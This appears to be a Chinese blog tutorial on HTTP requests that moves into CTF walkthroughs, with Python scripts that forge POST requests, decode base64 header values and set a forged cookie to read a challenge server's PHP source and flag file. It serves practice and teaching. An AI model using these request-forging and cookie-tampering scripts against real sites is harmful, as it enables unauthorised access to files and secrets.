web安全 模拟Http请求

其实一直想出一篇文章详解Http请求的，但是本人现在没有把握写的通俗易懂，但Http请求对于web至为重要,所以请萌新们不要浮躁，耐心看完Woo__dalao写的Http请求。
郑重声明：以下图片和文字来自一篇文章带你详解 HTTP 协议一文

Http协议概述
HTTP协议（HyperText Transfer Protocol，超文本传输协议）是用于从WWW服务器传输超文本到本地浏览器的传输协议。它可以使浏览器更加高效，使网络传输减少。它不仅保证计算机正确快速地传输超文本文档，还确定传输文档中的哪一部分，以及哪部分内容首先显示(如文本先于图形)等。

HTTP 工作过程

response.jpg

• 建立 TCP 连接
  在HTTP工作开始之前，客户端首先要通过网络与服务器建立连接，该连接是通过 TCP 来完成的，该协议与 IP 协议共同构建 Internet，即著名的 TCP/IP 协议族，因此 Internet 又被称作是 TCP/IP 网络。HTTP 是比 TCP 更高层次的应用层协议，根据规则，只有低层协议建立之后，才能进行高层协议的连接，因此，首先要建立 TCP 连接，一般 TCP 连接的端口号是80；
• 客户端向服务器发送请求命令
  一旦建立了TCP连接，客户端就会向服务器发送请求命令；
  例如：GET/sample/hello.jsp HTTP/1.1
• 客户端发送请求头信息
  客户端发送其请求命令之后，还要以头信息的形式向服务器发送一些别的信息，之后客户端发送了一空白行来通知服务器，它已经结束了该头信息的发送；
• 服务器应答
  客户端向服务器发出请求后，服务器会客户端返回响应；
  例如： HTTP/1.1 200 OK
  响应的第一部分是协议的版本号和响应状态码
• 服务器返回响应头信息
  正如客户端会随同请求发送关于自身的信息一样，服务器也会随同响应向用户发送关于它自己的数据及被请求的文档；
• 服务器向客户端发送数据
  服务器向客户端发送头信息后，它会发送一个空白行来表示头信息的发送到此为结束，接着，它就以 Content-Type 响应头信息所描述的格式发送用户所请求的实际数据；
• 服务器关闭 TCP 连接
  一般情况下，一旦服务器向客户端返回了请求数据，它就要关闭 TCP 连接，然后如果客户端或者服务器在其头信息加入了这行代码 Connection:keep-alive ，TCP 连接在发送后将仍然保持打开状态，于是，客户端可以继续通过相同的连接发送请求。保持连接节省了为每个请求建立新连接所需的时间，还节约了网络带宽。

对于Http报文客户端向服务器发送请求命令部分，让我们用一个简单的例子解析HTTP 协议报文结构

ps:这里推荐chorme浏览器的postman插件用来模拟http请求哦~

请求报文 POST /form/entry HTTP/1.1

request.png

响应报文 HTTP/1.1 200 OK

response.png

应用场景:在alert框中寻找flag
postman设置为Get请求，截获报文请求主体

NoEncode.jpg

咋一看最后一行长得像flag，我们抽一行看看转换编码试试，
咦~flag竟然躺在这里

选择unicode转ASCALL

flag.jpg

应用场景 伪造post请求

Test1:在x-www-form-urlencoded中填入
查找到的margin值
Result1:回显更新，有戏

return.jpg

查看分配给浏览器的headers,flag躺在这里

result.jpg

Test2:提交题目发现不正确，多次post报文段发现
flag -> 6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzog固定不变,但随后的字符串是随机生成的.应该是base64格式加密过了flag
Result2:

base64.jpg

Test3:根据上述还是不行，根源在于字符串是随机生成的,所以flag也是随机的,基于python2.7模拟Http请求
post.py

import requests
import base64

url = 'http://120.24.86.145:8002/web6/'
req = requests.session()
res = req.get(url)
flag = res.headers['flag']

txt = base64.b64decode(flag)
txt = txt[txt.index(":"):]
#找到:的前一个位置，从之后索引间隔一个位置向后扫描
txt = base64.b64decode(txt)

data = {'margin': txt}
ans = req.post(url,data)
print(ans.content)

Result3:拿到flag

finalkey.jpg

应用场景 Cookies欺骗

Test1:通过postman解析请求报文,使用base64解密，filename=keys.txt
观察到URL下存在index.php，修改filename=index.php,未回显。修改line字段同上

Result1

filename.jpg
Test2:基于python2.7,限定line参数范围为40个,获取index.php

import requests
import base64

url1 = 'http://120.24.86.145:8002/web11/index.php?line='
url2 = '&filename='

filename = base64.b64encode("index.php")
req = requests.session()
for line in range(0, 40):
    url = url1 + str(line) + url2 + filename
    print req.get(url).content

Result2 index.php要求filename=keys.php,且要验证cookies中的margin参数值为margin

D:\python27\python.exe F:/pythonProject/TestRun/Test.py 
<?php

  error_reporting(0);

  $file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");

  $line=isset($_GET['line'])?intval($_GET['line']):0;

  if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");

  $file_list = array(  '0' =>'keys.txt', '1' =>'index.php', );

  if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
  $file_list[2]='keys.php';

  }


  if(in_array($file, $file_list)){

  $fa = file($file);

  echo $fa[$line];

  }

?>

Test3:验证Cookies中的margin以及filename参数

import requests
import base64

url1 = 'http://120.24.86.145:8002/web11/index.php?line='
url2 = '&filename='

filename = base64.b64encode("index.php")
req = requests.session()
# for line in range(0, 40):
#     url = url1 + str(line) + url2 + filename
#     print req.get(url).content

filename = base64.b64encode("keys.php")
url = url1 + str(0) + url2 + filename
print req.get(url, cookies={'margin': 'margin'}).content

Result3:返回含有flag的php脚本

D:\python27\python.exe F:/pythonProject/TestRun/Test.py
<?php $key='KEY{key_keys}'; ?>

Process finished with exit code 0